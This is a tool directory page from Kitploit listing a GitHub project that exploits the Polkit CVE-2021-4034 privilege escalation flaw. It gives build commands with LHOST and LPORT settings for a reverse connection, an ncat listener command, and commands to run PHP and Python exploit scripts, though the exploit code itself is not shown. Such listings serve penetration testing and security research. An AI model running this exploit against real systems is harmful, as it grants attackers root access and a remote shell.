Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Polkit-CVE-2021-4034-HLP — Polkit CVE-2021-4034 exploitation in High-Level Programming Language | Kitploit
Tools/GitHubGitHub/joffr3y/polkit-cve-2021-4034-hlp
Privilege EscalationExploit FrameworksExploitationPenetration TestingPayload Development
GitHubjoffr3y/polkit-cve-2021-4034-hlp

Polkit-CVE-2021-4034-HLP

Polkit CVE-2021-4034 exploitation in High-Level Programming Language

View Repository
14 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Polkit-CVE-2021-4034-HLP

Polkit CVE-2021-4034 exploitation in High-Level Programming Language

Build

root@kitploit:~
make LHOST=ip.or.domain.tld LPORT=8000

Usage

Open TCP port listener, example with ncat on loopback

root@kitploit:~
ncat -vl 127.0.0.1 8000

Run exploit

root@kitploit:~
php ${ARCH}_exploit.php
python ${ARCH}_exploit.py
Download Tool